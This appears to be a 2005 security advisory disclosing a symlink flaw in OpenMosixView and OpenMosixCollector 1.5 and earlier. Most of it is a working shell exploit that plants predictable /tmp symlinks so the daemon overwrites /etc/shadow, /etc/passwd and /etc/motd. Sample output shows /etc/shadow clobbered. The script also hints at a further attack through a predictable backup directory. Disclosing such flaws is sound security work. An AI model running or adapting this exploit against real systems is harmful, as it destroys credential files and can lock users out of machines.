Summary
OpenMosix is "a Linux kernel extension for single-system image clustering which turns a network of ordinary computers into a supercomputer".

Lack of file content checking and file types allows local attackers to remove arbitrary files stored by the OpenMosix operating system.

Credit:
The information has been provided by rexolab.

Details
Vulnerable Systems:
* OpenMosixView version 1.5 and prior

At each start of the OpenMosixCollector daemon, each node's data load and saving is assigned to the directory /tmp/openmosixcollector where data are organised in several files:
[ file ] cluster
[ file ] IDnode-n
[ file ] IDnode-n
[ file ] sync.count
[ dir ] phist

The creation of predictable files allow any local attacker to remove arbitrary files on the vulnerable file system via a symlink vulnerability. In this case, we just have to rebuild a fake directory tree.

If openmosixcollector-daemon is already running there is also a way to corrupt the fs due to the creation of a predictable temporary backup directory evert 12 hours (see exploit below for more details).

Exploit:
#!/bin/sh
###############################################
# RX_oMcollector_proof.sh
# OpenMosixCollector exploit [25/03/2005]
# by Gangstuck and Psirac <research@rexotec.com>
###############################################

# -- Choose target
TARGET1="/etc/shadow" # OM view target
TARGET2="/etc/passwd" # OM collector target 1
TARGET3="/etc/motd" # OM collector target 2

# -- OpenMosixCollector temporary directory (without final '/')
OMCTDIR="/tmp/openmosixcollector"

echo "--------------------------------------------------------"
echo "- -= OpenMosixView and OpenMosixCollector =- -"
echo "- Symlink Vulnerability PoC -"
echo "- [versions 1.5 and minor] -"
echo "--------------------------------------------------------"
echo "- Gangstuck and Psirac -"
echo "- <research@rexotec.com> -"
echo "--------------------------------------------------------"

# -- OM View
ln -sf $TARGET1 /tmp/nodes.tmp
if [ $? ]; then
echo "[+] OpenMosixView attack successfully launched."
echo -e " - target is ${TARGET1}\n"
else
echo "[!] Failed to exploit OpenMosixView..."
fi

# -- OM Collector
if [ -d "$OMCTDIR" ]; then
echo -e "[!] Openmosix is already running.\n
Anyway, there is a way to exploit this case but this is not
implemented in this public exploit. OpenMosixcollector-daemon
automatically restarts every 12 hours and saves the current
history to a directory located in /tmp (glibc: P_tmpdir).

This is done whith the utilisation of a predictable temporary
dir name \"${OMCTDIR}_[date]\" where [date] format
look like \"18.0.2005-0.0.48\". Have phun :P"
exit 0
fi

echo -e "[-] OpenMosixCollector seems not to be started..."
echo " - creating fake directory"
mkdir $OMCTDIR
if [ ! $? ]; then
echo "[!] OpenMosixCollector attack failed !"
exit 1
fi
echo " - creating symlink attack against "
echo -e "\t> ${TARGET2}" && ln -sf $TARGET2 ${OMCTDIR}/cluster;
echo -e "\t> ${TARGET3}" && ln -sf $TARGET3 ${OMCTDIR}/sync.count;

echo "[+] OpenMosixCollector attack successfully launched."

#EOF

Proof of Concept:
$ ./RX_OMcollector_proof.sh
...
$ ls -l /tmp/nodes.tmp
lrwxrwxrwx 1 gang gang 12 2005-02-21 23:18 /tmp/nodes.tmp -> /etc/shadow

# openmosixview &
openMosix is started!
openMosix cluster contains 3 members.
cluster config changed! redraw cluster now.

$ cat /etc/shadow
192.168.0.11

# /etc/init.d/openmosixcollector start
Initializing openMosix...
openMosix configuration was successful :)